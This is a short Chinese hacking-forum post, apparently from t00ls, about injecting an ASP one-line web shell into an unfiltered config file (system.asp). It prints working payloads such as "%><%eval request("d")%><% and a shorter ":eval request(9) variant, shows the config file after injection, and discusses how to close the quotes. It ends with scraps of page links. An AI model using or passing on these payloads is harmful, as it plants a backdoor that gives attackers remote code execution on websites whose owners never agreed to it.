http://www.t00ls.net/viewthread.php?tid=13901
一句話插入配置文件system.asp
沒有過濾雙引號,插入一句就行。
常規插法如下:
"%><%eval request("d")%><%
但金刀客這篇文件(http://www.cqzh.cn/post/328.html)為什么說
"%><%eval request("d")%><%s="
必須要加s=呢?
比如:
web_name="中國紡織網"
插入后:
web_name="中國紡織網"%><%eval request("d")%><%"
跟這樣不就全閉合了嗎?
還需要<%s="干嘛?直接<%閉合下面的不就行了。
?
=========
":eval request(9)????? //這多簡單
=================
<%
webname="abc"
webhost="d:/abc/abc/www"
%>
插入"%><%eval request("d")%><%s="后就變成
<%
webname="abc"%><%eval request("d")%><%s=""
webhost="d:/abc/abc/www"
%>
![轉載]SA權限九種上傳方法](http://pic.xiahunao.cn/轉載]SA權限九種上傳方法)
)
)
–nodejs)
_全面解析Module模式)